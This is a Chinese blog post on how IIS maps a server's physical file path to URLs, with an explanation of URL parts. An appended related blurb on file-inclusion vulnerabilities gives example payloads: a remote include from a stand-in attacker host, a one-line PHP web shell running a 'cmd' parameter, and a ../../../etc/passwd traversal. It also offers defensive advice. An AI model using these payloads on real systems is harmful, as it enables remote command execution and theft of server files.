windows服务器实用(5)——服务器文件URL(补充)

上一篇我们用iIIS部署了一个网站。那么本地是通过什么来访问服务端的资源的呢?

服务端的物理资源

这是上篇我们的设置服务端的物理地址。
在这里插入图片描述
位于服务器的F盘的picturelist文件夹下:
在这里插入图片描述
我们可以直接登录服务器,找到1.jpg
在这里插入图片描述

可以看到打开的是文件的物理路径,也就是绝对路径。

URL

URL(Uniform Resource Locator,统一资源定位符)是互联网上用于定位和访问资源的一种标识符。URL通常用于表示网页、图片、音频、视频等资源的位置和访问方式,它由多个部分组成,包括:

  • 协议(Protocol):用于指定客户端和服务器之间通信时所采用的协议,如HTTP、HTTPS、FTP等。
  • 主机名(Host):用于指定资源所在的服务器的主机名或IP地址。
  • 端口号(Port):用于指定客户端与服务器之间通信的端口号,如果没有指定则使用默认端口号。
  • 路径(Path):用于指定资源在服务器中的位置和访问路径。
  • 查询参数(Query Parameters):用于向服务器传递额外的参数和信息,通常采用键值对的形式。
  • 锚点(Anchor):用于指定文档中的一个位置,用于页面内部的跳转。

URL在互联网上广泛使用,常见的例子包括:http://www.example.com/index.html、ftp://ftp.example.com/pub/file.zip、https://www.example.com/search?q=url等。通过URL,用户可以方便地访问和定位网络上的资源,而开发人员可以使用URL来构建Web应用程序和实现数据交互等功能。

物理路径、虚拟路径以及网络路径

我们在浏览器中输入地址:

http://localhost:8082/img/1.jpg

发现我们可以正确的打开这个图片。
也就是说,IIS实际上是把文件路径到了这个http://localhost:8082/目录下:
对比图如下:
在这里插入图片描述
这里localhost就是本地的主机ip。

如果在其他网络通畅的地方访问,便是:

http://192.168.50.69:8082/img/1.jpg

同样的,可以使用URL定位到其他的文件。

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
远程文件包含(Remote File Inclusion,RFI)和服务器文件包含(Server Side Include,SSI)是常见的Web应用程序漏洞,攻击者通过利用这些漏洞可以获取网站服务器上的敏感信息,甚至控制整个服务器。下面我来介绍一下这两种漏洞。 一、远程文件包含 远程文件包含是指攻击者通过Web应用程序加载远程托管的文件,这些文件可能包含恶意代码,攻击者可以利用这些代码执行各种攻击,例如窃取敏感信息、控制服务器等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载远程的evil.txt文件,并执行其中的代码。攻击者可以在evil.txt中写入任意的PHP代码,例如: ``` <?php echo shell_exec($_GET['cmd']); ?> ``` 这段代码会执行用户传入的cmd参数,并将结果输出,攻击者可以通过以下URL执行任意的系统命令: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt&cmd=ls%20-la ``` 二、服务器文件包含 服务器文件包含是指Web应用程序在处理动态内容时,将用户输入作为文件名或路径名进行处理,攻击者可以利用这个漏洞访问其他文件中的代码,例如配置文件、用户数据等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=../../../etc/passwd ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载/etc/passwd文件,并将其中的内容输出到页面上,攻击者可以通过这种方式获取敏感信息。 总结 要防止远程文件包含和服务器文件包含漏洞,应该对所有用户输入进行过滤和验证,避免用户输入作为文件名或路径名进行处理。应用程序应该使用白名单机制,仅允许访问特定目录下的文件,而不是允许任意文件访问。此外,应用程序应该启用PHP的安全模式,禁止执行外部命令、禁止访问网络等操作,以提高安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值